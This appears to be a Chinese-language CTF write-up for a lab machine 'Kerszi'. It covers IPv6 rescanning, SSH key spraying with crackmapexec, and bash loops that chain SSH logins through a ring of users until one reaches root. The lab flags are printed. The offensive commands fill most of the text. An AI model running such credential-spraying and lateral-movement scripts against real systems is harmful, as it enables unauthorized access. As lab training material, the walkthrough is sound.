信息收集

cmd

1┌──(root㉿kali)-[~]2└─# IP=192.168.5.2103

扫描端口

bash

1┌──(root㉿kali)-[/home/kali/Desktop]2└─# rustscan -a $IP --ulimit 5000 -- -sV -sC3.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.4| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |5| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |6`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'7The Modern Day Port Scanner.8________________________________________9: http://discord.skerritt.blog         :10: https://github.com/RustScan/RustScan :11 --------------------------------------12RustScan: Where scanning meets swagging. 😎13 14[~] The config file is expected to be at "/root/.rustscan.toml"15[~] Automatically increasing ulimit value to 5000.16Open 192.168.5.210:8017...

在 80 端口的页面底部写了 This Website support IPv6 Networks，换 IPv6 重扫一遍，先拿到靶机的 IPv6 地址

bash

1┌──(root㉿kali)-[/home/kali/Desktop]2└─# dig AAAA Kerszi.lan3 4; <<>> DiG 9.20.9-1-Debian <<>> AAAA Kerszi.lan5;; global options: +cmd6;; Got answer:7;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 565418;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 19 10;; OPT PSEUDOSECTION:11; EDNS: version: 0, flags:; MBZ: 0x0005, udp: 409612;; QUESTION SECTION:13;Kerszi.lan.                    IN      AAAA14 15;; ANSWER SECTION:16Kerszi.lan.             5       IN      AAAA    fdf6:5504:618a::e0117 18;; Query time: 4 msec19;; SERVER: 192.168.249.2#53(192.168.249.2) (UDP)20;; WHEN: Sun May 31 04:26:31 EDT 202621;; MSG SIZE  rcvd: 67

然后重新扫一遍

bash

1┌──(root㉿kali)-[/home/kali/Desktop]2└─# rustscan -a fdf6:5504:618a::e01 --ulimit 5000 -- -sV -sC3.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.4| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |5| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |6`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'7The Modern Day Port Scanner.8________________________________________9: http://discord.skerritt.blog         :10: https://github.com/RustScan/RustScan :11 --------------------------------------12To scan or not to scan? That is the question.13 14[~] The config file is expected to be at "/root/.rustscan.toml"15[~] Automatically increasing ulimit value to 5000.16Open [fdf6:5504:618a::e01]:2217Open [fdf6:5504:618a::e01]:8018...

爆破

bash

1┌──(root㉿kali)-[/home/kali/Desktop]2└─# crackmapexec ssh fdf6:5504:618a::e01 -u users.txt -p "" --key-file id_ed25519.txt --continue-on-success3[*] First time use detected4[*] Creating home directory structure5[*] Creating default workspace6[*] Initializing FTP protocol database7[*] Initializing SMB protocol database8[*] Initializing WINRM protocol database9[*] Initializing SSH protocol database10[*] Initializing RDP protocol database11[*] Initializing LDAP protocol database12[*] Initializing MSSQL protocol database13[*] Copying default configuration file14[*] Generating SSL certificate15SSH         fdf6:5504:618a::e01 22     fdf6:5504:618a::e01 [*] SSH-2.0-OpenSSH_10.0p2 Debian-7+deb13u116SSH         fdf6:5504:618a::e01 22     fdf6:5504:618a::e01 [+] ll104567: (keyfile: id_ed25519.txt) 17SSH         fdf6:5504:618a::e01 22     fdf6:5504:618a::e01 [+] scdyh: (keyfile: id_ed25519.txt) 18SSH         fdf6:5504:618a::e01 22     fdf6:5504:618a::e01 [-] kaada: (keyfile: id_ed25519.txt) Authentication failed.19SSH         fdf6:5504:618a::e01 22     fdf6:5504:618a::e01 [-] eecho: (keyfile: id_ed25519.txt) Authentication failed.20SSH         fdf6:5504:618a::e01 22     fdf6:5504:618a::e01 [-] yedongcong: (keyfile: id_ed25519.txt) Authentication failed.21SSH         fdf6:5504:618a::e01 22     fdf6:5504:618a::e01 [-] chenyulin: (keyfile: id_ed25519.txt) Authentication failed.22SSH         fdf6:5504:618a::e01 22     fdf6:5504:618a::e01 [-] u12138: (keyfile: id_ed25519.txt) Authentication failed.23ERROR:paramiko.transport:Exception (client): Error reading SSH protocol banner[Errno 104] Connection reset by peer24...

后面触发防爆破限制了，不过拿到了两个有效凭证，ll104567 和 scdyh 都可以登录

ll104567

直接拿私钥登录 ll104567

bash

1┌──(root㉿kali)-[/home/kali/Desktop]2└─# ssh -i id_ed25519.txt ll104567@fdf6:5504:618a::e013The authenticity of host 'fdf6:5504:618a::e01 (fdf6:5504:618a::e01)' can't be established.4ED25519 key fingerprint is SHA256:MjoUe5ON03T2UcSPmlU3evmpGUywqf/3IUm0+1p77cI.5This key is not known by any other names.6Are you sure you want to continue connecting (yes/no/[fingerprint])? yes7Warning: Permanently added 'fdf6:5504:618a::e01' (ED25519) to the list of known hosts.8Linux Kerszi 7.0.8-1-liquorix-amd64 #1 ZEN SMP PREEMPT liquorix 7.0-8.1~trixie (2026-05-15) x86_649 10The programs included with the Debian GNU/Linux system are free software;11the exact distribution terms for each program are described in the12individual files in /usr/share/doc/*/copyright.13 14Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent15permitted by applicable law.16Last login: Sat May 30 10:40:28 2026 from fe80::a00:27ff:fe3b:ba2b%enp0s317ll104567@Kerszi:~$ id18uid=1000(ll104567) gid=1000(ll104567) groups=1000(ll104567)19ll104567@Kerszi:~$ ls -l20total 421-rw-r--r-- 1 root root 44 May 30 09:31 user.txt22ll104567@Kerszi:~$ cat user.txt23flag{user-535f2af0a4b556de1bdc58b32b6004f7}

横向移移移移移动

bash

1ll104567@Kerszi:~$ ls -la2total 13923drwx------  5 ll104567 ll104567    4096 May 31 07:26 .4drwxr-xr-x 52 root     root        4096 May 30 09:24 ..5lrwxrwxrwx  1 root     root           9 May 30 09:27 .bash_history -> /dev/null6-rw-r--r--  1 ll104567 ll104567     220 Mar  8 11:21 .bash_logout7-rw-r--r--  1 ll104567 ll104567    3526 Mar  8 11:21 .bashrc8drwxrwxr-x  4 ll104567 ll104567    4096 May 31 07:26 dirtyfrag9drwx------  2 ll104567 ll104567    4096 May 31 05:20 .gnupg10-rw-rw-r--  1 ll104567 ll104567  320450 May 31 05:20 linpeas.log11-rwxrwxr-x  1 ll104567 ll104567 1064716 May 31 05:16 linpeas.sh12-rw-r--r--  1 ll104567 ll104567     807 Mar  8 11:21 .profile13drwx------  2 ll104567 ll104567    4096 May 31 05:07 .ssh14-rw-r--r--  1 root     root          44 May 30 09:31 user.txt15ll104567@Kerszi:~$ cd .ssh16ll104567@Kerszi:~/.ssh$ ls -la17total 2818drwx------ 2 ll104567 ll104567 4096 May 31 05:07 .19drwx------ 5 ll104567 ll104567 4096 May 31 07:26 ..20-rw------- 1 ll104567 ll104567  190 May 30 10:37 authorized_keys21-rw------- 1 ll104567 ll104567  399 May 30 09:26 id_ed2551922-rw-r--r-- 1 ll104567 ll104567   95 May 30 09:26 id_ed25519.pub23-rw------- 1 ll104567 ll104567  978 May 31 05:07 known_hosts24-rw-r--r-- 1 ll104567 ll104567  142 May 31 04:59 known_hosts.old25ll104567@Kerszi:~/.ssh$ cat authorized_keys26ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILFfuwgEwLfckC/y+WSwBnLM17Yv2kHsF8yUk4ZUEM1V sublarge@maze27ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII1mxjbOD6ZRsQbdQBNmQiQFFc28GCaGtFGf5OQnjG3z ll104567@maze

发现当前用户有 sublarge 的公钥，那么会不会别的用户有 ll104567 的公钥呢？挨个试试看

bash

1for user in $(ls /home); do2    while true; do3        result=$(ssh -o BatchMode=yes -o PasswordAuthentication=no \4            -o StrictHostKeyChecking=no -o ConnectTimeout=5 \5            $user@localhost "echo LOGIN_OK; id; sudo -n -l" 2>&1)6        if echo "$result" | grep -q "LOGIN_OK"; then7            ssh -o BatchMode=no -o PasswordAuthentication=no \8                -o StrictHostKeyChecking=no \9                $user@localhost10            break 211        elif echo "$result" | grep -q "Connection closed"; then12            sleep 513        else14            break15        fi16    done17done

发现果然如此，爆破了一下发现链条大概长这样：ll104567 -> scdyh -> kaada -> eecho -> …

到这里发现有点眼熟了，和前面前端拿到的用户列表的顺序对上了

javascript

1const users = [2    "ll104567", "scdyh", "kaada", "eecho", "yedongcong",3    "chenyulin", "u12138", "ahiz", "hel2zy", "dark_dragon",4    "lingdong", "lpppp", "tuf", "meiyouqian", "mono",5    "luoyinhui", "ipv32_jo99", "ta0", "u111", "seeyou",6    "room_chan", "hyh", "lingmj", "xunfangzhong", "l1qin9",7    "mingmingjiu", "u20206675", "jiucaiye", "1xt0m", "dream_speeder",8    "yong", "wea5e1", "zuoyu", "wackymaker", "liuyun",9    "miao", "yliken", "fly_high", "yolo", "shanran",10    "sakuya", "mooi", "chuan", "wy", "u3170",11    "wh1tesu", "dingtom", "none", "gropers", "sublarge"12];

就用这个顺序做一个数组，遍历数组匹配当前用户名，然后 SSH 登录下一个用户

bash

1current=$(whoami)2users=(ll104567 scdyh kaada eecho yedongcong chenyulin u12138 ahiz hel2zy dark_dragon lingdong lpppp tuf meiyouqian mono luoyinhui ipv32_jo99 ta0 u111 seeyou room_chan hyh lingmj xunfangzhong l1qin9 mingmingjiu u20206675 jiucaiye 1xt0m dream_speeder yong wea5e1 zuoyu wackymaker liuyun miao yliken fly_high yolo shanran sakuya mooi chuan wy u3170 wh1tesu dingtom none gropers sublarge)3for i in "${!users[@]}"; do4    if [ "${users[$i]}" = "$current" ]; then5        next=${users[$((i+1))]}6        ssh $next@localhost7        break8    fi9done

等登录到 sublarge 就该停下来了，但是翻了一下并没有新的线索，并且 sublarge 可以登录到 ll104567，说明这并不是一个以 sublarge 为末尾的链条，而是一个环，先回到 ll104567

bash

1sublarge@Kerszi:~$ ssh ll104567@localhost2Linux Kerszi 7.0.8-1-liquorix-amd64 #1 ZEN SMP PREEMPT liquorix 7.0-8.1~trixie (2026-05-15) x86_643 4The programs included with the Debian GNU/Linux system are free software;5the exact distribution terms for each program are described in the6individual files in /usr/share/doc/*/copyright.7 8Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent9permitted by applicable law.10Last login: Sun May 31 08:43:30 2026 from ::1

提权

推测其中的某一个用户可以像登录其他用户那样登录到 root，修改代码从头跑一遍，这回的逻辑是在登录下一个用户之前先试试看能不能登录到 root

bash

1current=$(whoami)2users=(ll104567 scdyh kaada eecho yedongcong chenyulin u12138 ahiz hel2zy dark_dragon lingdong lpppp tuf meiyouqian mono luoyinhui ipv32_jo99 ta0 u111 seeyou room_chan hyh lingmj xunfangzhong l1qin9 mingmingjiu u20206675 jiucaiye 1xt0m dream_speeder yong wea5e1 zuoyu wackymaker liuyun miao yliken fly_high yolo shanran sakuya mooi chuan wy u3170 wh1tesu dingtom none gropers sublarge)3for i in "${!users[@]}"; do4    if [ "${users[$i]}" = "$current" ]; then5        next=${users[$((i+1))]}6        ssh -o BatchMode=yes -o PasswordAuthentication=no -o StrictHostKeyChecking=no root@localhost "exit 0" 2>/dev/null && ssh root@localhost && break7        ssh $next@localhost8        break9    fi10done

最后在 jiucaiye 登录到了 root

bash

1jiucaiye@Kerszi:~$ current=$(whoami)2users=(ll104567 scdyh kaada eecho yedongcong chenyulin u12138 ahiz hel2zy dark_dragon lingdong lpppp tuf meiyouqian mono luoyinhui ipv32_jo99 ta0 u111 seeyou room_chan hyh lingmj xunfangzhong l1qin9 mingmingjiu u20206675 jiucaiye 1xt0m dream_speeder yong wea5e1 zuoyu wackymaker liuyun miao yliken fly_high yolo shanran sakuya mooi chuan wy u3170 wh1tesu dingtom none gropers sublarge)3for i in "${!users[@]}"; do4    if [ "${users[$i]}" = "$current" ]; then5        next=${users[$((i+1))]}6        ssh -o BatchMode=yes -o PasswordAuthentication=no -o StrictHostKeyChecking=no root@localhost "exit 0" 2>/dev/null && ssh root@localhost && break7        ssh $next@localhost8        break9    fi10done11Linux Kerszi 7.0.8-1-liquorix-amd64 #1 ZEN SMP PREEMPT liquorix 7.0-8.1~trixie (2026-05-15) x86_6412 13The programs included with the Debian GNU/Linux system are free software;14the exact distribution terms for each program are described in the15individual files in /usr/share/doc/*/copyright.16 17Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent18permitted by applicable law.19Last login: Sat May 30 10:41:58 2026 from fe80::a00:27ff:fe3b:ba2b%enp0s320root@Kerszi:~# id21uid=0(root) gid=0(root) groups=0(root)22root@Kerszi:~# ls -la23total 3624drwx------  4 root root 4096 May 30 10:41 .25drwxr-xr-x 18 root root 4096 May 16 05:19 ..26lrwxrwxrwx  1 root root    9 May 11 00:24 .bash_history -> /dev/null27-rw-r--r--  1 root root  607 Mar  2 16:50 .bashrc28-rw-------  1 root root   20 May 15 18:33 .lesshst29drwxr-xr-x  3 root root 4096 Apr 25 06:38 .local30-rw-r--r--  1 root root  132 Mar  2 16:50 .profile31-rw-r--r--  1 root root   44 May 30 09:31 root.txt32-rw-r--r--  1 root root   21 May 30 09:32 rp.txt33drwx------  2 root root 4096 May 30 10:39 .ssh34root@Kerszi:~# cat root.txt35flag{root-3525d43865cd4e1b2d84d217192b32d4}